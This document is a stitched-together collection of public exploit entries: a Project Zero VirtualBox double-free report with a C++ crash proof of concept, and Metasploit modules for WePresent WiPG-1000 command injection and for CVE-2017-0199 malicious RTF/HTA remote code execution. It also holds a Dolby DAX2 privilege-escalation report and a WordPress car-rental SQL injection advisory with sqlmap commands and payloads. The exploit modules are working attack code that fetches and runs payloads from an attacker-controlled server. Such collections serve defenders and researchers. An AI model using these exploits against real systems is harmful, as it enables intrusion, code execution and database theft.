return False
if __name__ == '__main__':
main()
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1227
We have discovered a heap double-free vulnerability in the latest version of VirtualBox (5.1.18), with Guest Additions (and more specifically shared folders) enabled in the guest operating system. The heap memory corruption takes place in the VirtualBox.exe process running on a Windows host (other host platforms were untested). It can be triggered from an unprivileged ring-3 process running in a Windows guest, by performing two nt!NtQueryDirectoryFile system calls [1] against a shared (sub)directory one after another: the first one with the ReturnSingleEntry argument set to FALSE, and the next one with ReturnSingleEntry=TRUE. During the second system call, a double free takes place and the VM execution is aborted.
We have confirmed that the vulnerability reproduces with Windows 7/10 32-bit as the guest, and Windows 7 64-bit as the host system, but haven’t checked other configurations. However, it seems very likely that the specific version of Windows as the guest/host is irrelevant.
It also seems important for reproduction that the shared directory being queried has some files (preferably a few dozen) inside of it. The attached Proof of Concept program (written in C++, can be compiled with Microsoft Visual Studio) works by first creating a dedicated directory in the shared folder (called “vbox_crash”), and then creating 16 files with ~128 byte long names, which appears to be sufficient to always trigger the bug. Finally, it invokes the nt!NtQueryDirectoryFile syscall twice, leading to a VM crash. While the PoC requires write access to the shared folder to set up reliable conditions, it is probably not necessary in practical scenarios, as long as the shared folder already contains some files (which is most often the case).
If we assume that the shared folder is mounted as drive E, we can start the PoC as follows:
>VirtualBoxKiller.exe E:\
Immediately after pressing "enter", the virtual machine should be aborted. The last two lines of the VBoxHardening.log file corresponding to the VM should be similar to the following:
--- cut ---
3e28.176c: supR3HardNtChildWaitFor[2]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468037 ms, the end);
1020.3404: supR3HardNtChildWaitFor[1]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468638 ms, the end);
--- cut ---
The 0xc0000374 exit code above translates to STATUS_HEAP_CORRUPTION. A summary of the crash and the corresponding stack trace is as follows:
--- cut ---
1: kd> g
Critical error detected c0000374
Break instruction exception - code 80000003 (first chance)
ntdll!RtlReportCriticalFailure+0x2f:
0033:00000000`76f3f22f cc int 3
1: kd> kb
RetAddr : Args to Child : Call Site
00000000`76f3f846 : 00000000`00000002 00000000`00000023 00000000`00000087 00000000`00000003 : ntdll!RtlReportCriticalFailure+0x2f
00000000`76f40412 : 00000000`00001010 00000000`03a50000 00000000`00001000 00000000`00001000 : ntdll!RtlpReportHeapFailure+0x26
00000000`76f42084 : 00000000`03a50000 00000000`05687df0 00000000`00000000 00000000`038d0470 : ntdll!RtlpHeapHandleError+0x12
00000000`76eda162 : 00000000`05687de0 00000000`00000000 00000000`00000000 000007fe`efc8388b : ntdll!RtlpLogHeapFailure+0xa4
00000000`76d81a0a : 00000000`00000000 00000000`03f0e1b0 00000000`111fdd40 00000000`00000000 : ntdll!RtlFreeHeap+0x72
00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`08edf790 00000000`05661c00 : kernel32!HeapFree+0xa
000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`03f0e1b0 : MSVCR100!free+0x1c
000007fe`f4613a96 : 00000000`05661d16 00000000`00000000 00000000`00000000 00000000`05687df0 : VBoxRT+0xc8fef
000007fe`f4611a48 : 00000000`056676d0 00000000`08edf830 00000000`00000000 00000000`05661c98 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
000007fe`ee885c22 : 00000000`111fdd30 00000000`111fdd30 00000000`03f352b0 00000000`0000018c : VBoxSharedFolders+0x1a48
000007fe`ee884a2c : 00000000`00000000 00000000`111fdd30 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
000007fe`efc13b2f : 00000000`05747fe0 00000000`00000da4 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x47a6c
000007fe`efc91122 : 00000000`05737e90 00000000`05737e90 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
00000000`72561d9f : 00000000`05737e90 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
00000000`72561e3b : 00000000`725f2ac0 00000000`05737e90 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---
When the "Heaps" option is enabled for VirtualBox.exe in Application Verifier, the crash is reported in the following way:
--- cut ---
1: kd> g
=======================================
VERIFIER STOP 0000000000000007: pid 0xC08: Heap block already freed.
000000000DCB1000 : Heap handle for the heap owning the block.
000000001C37E000 : Heap block being freed again.
0000000000000000 : Size of the heap block.
0000000000000000 : Not used
=======================================
This verifier stop is not continuable. Process will be terminated
when you use the `go' debugger command.
=======================================
1: kd> kb
RetAddr : Args to Child : Call Site
000007fe`f42437ee : 00000000`00000000 00000000`1c37e000 000007fe`f42415a8 000007fe`f42520b0 : ntdll!DbgBreakPoint
000007fe`f4249970 : 00000000`265cf5b8 00000000`00000007 00000000`0dcb1000 00000000`1c37e000 : vrfcore!VerifierStopMessageEx+0x772
000007fe`f302931d : 00000000`1c186a98 00000000`00000000 00000000`265cf520 00100000`265cf520 : vrfcore!VfCoreRedirectedStopMessage+0x94
000007fe`f3026bc1 : 00000000`0dcb1000 00000000`1c37e000 00000000`00000000 00000000`0dcb1000 : verifier!AVrfpDphReportCorruptedBlock+0x155
000007fe`f3026c6f : 00000000`0dcb1000 00000000`1c37e000 00000000`0dcb1000 00000000`00002000 : verifier!AVrfpDphFindBusyMemoryNoCheck+0x71
000007fe`f3026e45 : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`1717ed08 : verifier!AVrfpDphFindBusyMemory+0x1f
000007fe`f302870e : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`0dcb1038 : verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x25
00000000`76f440d5 : 00000000`00000000 00000000`00000000 00000000`00001000 00000000`00000000 : verifier!AVrfDebugPageHeapFree+0x8a
00000000`76ee796c : 00000000`0dcb0000 00000000`00000000 00000000`0dcb0000 00000000`00000000 : ntdll!RtlDebugFreeHeap+0x35
00000000`76d81a0a : 00000000`0dcb0000 000007fe`efc41b01 00000000`00000000 00000000`1c37e000 : ntdll! ?? ::FNODOBFM::`string'+0xe982
00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`265cfb10 00000000`1c341f00 : kernel32!HeapFree+0xa
000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`67e40fe0 : MSVCR100!free+0x1c
000007fe`f4923a96 : 00000000`1c342076 00000000`00000000 00000000`00000000 00000000`1c37e000 : VBoxRT+0xc8fef
000007fe`f4921a48 : 00000000`5c774ff0 00000000`265cfbb0 00000000`00000000 00000000`1c341ff8 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
000007fe`ee595c22 : 00000000`63097f60 00000000`63097f60 00000000`25f81f30 00000000`0000018c : VBoxSharedFolders+0x1a48
000007fe`ee594a2c : 00000000`00000000 00000000`63097f60 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
000007fe`efc13b2f : 00000000`25339730 00000000`000004c8 00000000`00000000 00000000`1dce4d30 : VBoxC!VBoxDriversRegister+0x47a6c
000007fe`efc91122 : 00000000`1dce4d30 00000000`1dce4d30 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
00000000`72561d9f : 00000000`1dce4d30 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
00000000`72561e3b : 00000000`725f2ac0 00000000`1dce4d30 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---
Due to the nature of the flaw (heap memory corruption), it could potentially make it possible for an unprivileged guest program to escape the VM and execute arbitrary code on the host, hence we consider it to be a high-severity issue.
References:
[1] ZwQueryDirectoryFile routine, https://msdn.microsoft.com/en-us/library/windows/hardware/ff567047(v=vs.85).aspx
*/
#include <Windows.h>
#include <winternl.h>
#include <cstdio>
#include <time.h>
extern "C"
NTSTATUS WINAPI NtQueryDirectoryFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_Out_ PVOID FileInformation,
_In_ ULONG Length,
_In_ FILE_INFORMATION_CLASS FileInformationClass,
_In_ BOOLEAN ReturnSingleEntry,
_In_opt_ PUNICODE_STRING FileName,
_In_ BOOLEAN RestartScan
);
typedef struct _FILE_DIRECTORY_INFORMATION {
ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;
int main(int argc, char **argv) {
// Validate command line format.
if (argc != 2) {
printf("Usage: %s <path to a writable shared folder>\n", argv[0]);
return 1;
}
// Initialize the PRNG.
srand((unsigned int)time(NULL));
// Create a subdirectory dedicated to demonstrating the vulnerability.
CHAR TmpDirectoryName[MAX_PATH];
_snprintf_s(TmpDirectoryName, sizeof(TmpDirectoryName), "%s\\vbox_crash", argv[1]);
if (!CreateDirectoryA(TmpDirectoryName, NULL) && GetLastError() != ERROR_ALREADY_EXISTS) {
printf("CreateDirectory failed, %d\n", GetLastError());
return 1;
}
// Create 16 files with long (128-byte) names, which appears to always be sufficient to trigger the bug.
CONST UINT kTempFilesCount = 16;
CONST UINT kTempFilenameLength = 128;
CHAR TmpFilename[kTempFilenameLength + 1], TmpFilePath[MAX_PATH];
memset(TmpFilename, 'A', kTempFilenameLength);
TmpFilename[kTempFilenameLength] = '\0';
for (UINT i = 0; i < kTempFilesCount; i++) {
_snprintf_s(TmpFilePath, sizeof(TmpFilePath), "%s\\%s.%u", TmpDirectoryName, TmpFilename, rand());
HANDLE hFile = CreateFileA(TmpFilePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
printf("CreateFile#1 failed, %d\n", GetLastError());
return 1;
}
CloseHandle(hFile);
}
// Open the temporary directory.
HANDLE hDirectory = CreateFileA(TmpDirectoryName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDirectory == INVALID_HANDLE_VALUE) {
printf("CreateFile#2 failed, %d\n", GetLastError());
return 1;
}
IO_STATUS_BLOCK iosb;
FILE_DIRECTORY_INFORMATION fdi;
// Perform the first call, with ReturnSingleEntry set to FALSE.
NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, FALSE, NULL, TRUE);
// Now make the same call, but with ReturnSingleEntry=TRUE. This should crash VirtualBox.exe on the host with a double-free exception.
NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, TRUE, NULL, TRUE);
// We should never reach here.
CloseHandle(hDirectory);
return 0;
}
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'WePresent WiPG-1000 Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in an undocumented
CGI file in several versions of the WePresent WiPG-1000 devices.
Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matthias Brun', # Vulnerability Discovery, Metasploit Module
],
'References' =>
[
[ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ]
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat openssl'
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['WiPG-1000 <=2.0.0.7', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 20 2017',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => '/cgi-bin/rdfs.cgi'
})
if res && res.body.include?("Follow administrator instructions to enter the complete path")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
print_status('Sending request')
send_request_cgi(
'method' => 'POST',
'uri' => '/cgi-bin/rdfs.cgi',
'vars_post' => {
'Client' => ";#{payload.encoded};",
'Download' => 'Download'
}
)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => "Microsoft Office Word Malicious Hta Execution",
'Description' => %q{
This module creates a malicious RTF file that when opened in
vulnerable versions of Microsoft Word will lead to code execution.
The flaw exists in how a olelink object can make a http(s) request,
and execute hta code in response.
This bug was originally seen being exploited in the wild starting
in Oct 2016. This module was created by reversing a public
malware sample.
},
'Author' =>
[
'Haifei Li', # vulnerability analysis
'ryHanson',
'wdormann',
'DidierStevens',
'vysec',
'Nixawk', # module developer
'sinn3r' # msf module improvement
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2017-0199'],
['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],
['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],
['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],
['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],
['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],
['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],
['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],
['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],
['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],
['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],
['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],
['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Microsoft Office Word', {} ]
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
},
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Apr 14 2017'))
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta'])
], self.class)
end
def generate_uri
uri_maxlength = 112
host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
scheme = datastore['SSL'] ? 'https' : 'http'
uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
uri.delete!("\n")
uri.delete!("\\x")
uri.delete!("\\")
padding_length = uri_maxlength * 2 - uri.length
fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative?
padding_length.times { uri << "0" }
uri
end
def create_ole_ministream_data
# require 'rex/ole'
# ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
# ministream = ole.instance_variable_get(:@ministream)
# ministream_data = ministream.instance_variable_get(:@data)
ministream_data = ""
ministream_data << "01000002090000000100000000000000" # 00000000: ................
ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y
ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K......
ministream_data << generate_uri
ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.]
ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............
ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F
ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................
ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7...........
ministream_data << "00000000000000000000000000000000" # 000000f0: ................
ministream_data << "100203000d0000000000000000000000" # 00000100: ................
ministream_data << "00000000000000000000000000000000" # 00000110: ................
ministream_data << "00000000000000000000000000000000" # 00000120: ................
ministream_data << "00000000000000000000000000000000" # 00000130: ................
ministream_data << "00000000000000000000000000000000" # 00000140: ................
ministream_data << "00000000000000000000000000000000" # 00000150: ................
ministream_data << "00000000000000000000000000000000" # 00000160: ................
ministream_data << "00000000000000000000000000000000" # 00000170: ................
ministream_data << "00000000000000000000000000000000" # 00000180: ................
ministream_data << "00000000000000000000000000000000" # 00000190: ................
ministream_data << "00000000000000000000000000000000" # 000001a0: ................
ministream_data << "00000000000000000000000000000000" # 000001b0: ................
ministream_data << "00000000000000000000000000000000" # 000001c0: ................
ministream_data << "00000000000000000000000000000000" # 000001d0: ................
ministream_data << "00000000000000000000000000000000" # 000001e0: ................
ministream_data << "00000000000000000000000000000000" # 000001f0: ................
ministream_data
end
def create_rtf_format
template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
template_rtf = ::File.open(template_path, 'rb')
data = template_rtf.read(template_rtf.stat.size)
data.gsub!('MINISTREAM_DATA', create_ole_ministream_data)
template_rtf.close
data
end
def on_request_uri(cli, req)
p = regenerate_payload(cli)
data = Msf::Util::EXE.to_executable_fmt(
framework,
ARCH_X86,
'win',
p.encoded,
'hta-psh',
{ :arch => ARCH_X86, :platform => 'win' }
)
# This allows the HTA window to be invisible
data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")
send_response(cli, data, 'Content-Type' => 'application/hta')
end
def exploit
file_create(create_rtf_format)
super
end
end
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075
Windows: Dolby Audio X2 Service Elevation of Privilege
Platform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016.
Class: Elevation of Privilege
Summary:
The DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges.
Description:
The DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There’s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.
Microsoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.
Proof of Concept:
To demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. The executable to use is ExploitDotNetDCOMSerialization.exe.
1) From a command prompt run the command “ExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad”
2) Check the currently running processes for the privileged copy of notepad,
Expected Result:
No privilege escalation occurs.
Observed Result:
An instance of notepad is running at system privileges.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41933.zip
# Exploit Title: Car Rental System v2.5
# Date: 28/03/2017
# Exploit Author: TAD GROUP
# Vendor Homepage: https://www.bestsoftinc.com/
# Software Link: https://www.bestsoftinc.com/car-rental-system.html
# Version: 2.5
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1. Description
An unescaped parameter was found in Car Rental System v2.5 (WP plugin). An attacker can exploit this vulnerability to read from the database.
The POST parameters 'pickuploc', 'dropoffloc', and 'car_type' are vulnerable.
2. Proof of concept
sqlmap -u "http://server/wp-car/" —data="pickuploc=2&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=" --dbs --threads=5 --random-agent
Parameter: pickuploc (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pickuploc=2 AND 3834=3834&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pickuploc=2 AND SLEEP(5)&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
The same is applicable for 'dropoffloc' and 'car_type' parameters
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
4. Impact
Critical
5. Affected versions
<= 2.5
6. Disclosure timeline
13-Mar-2017 - found the vulnerability
13-Mar-2017 - informed the developer
28-Mar-2017 - release date of this security advisory
Not fixed at the date of submitting this exploit.